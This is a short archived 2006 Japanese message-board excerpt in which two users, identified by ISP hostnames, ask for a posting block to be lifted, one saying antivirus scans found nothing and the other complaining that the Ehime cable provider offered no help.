0409 [―{}@{}@{}-] i125-204-125-74.s10.a026.ap.plala.or.jp
垢版 |
2006/08/08(火) 12:03:57ID:FZSVoA890
ウィルスバスター2006とノートンでチェック済み
ウィルス検出されませんでした
規制解除してください
0410 [―{}@{}@{}-] family.e-catv.ne.jp
垢版 |
2006/08/08(火) 12:25:30ID:nyHR0sXe0
愛媛catvは
よくわからないから何もできませんと抜かしました。
いったい我々愛媛県人はどうすればいんでしょう・・・・
■ このスレッドは過去ログ倉庫に格納されています
ニューススポーツなんでも実況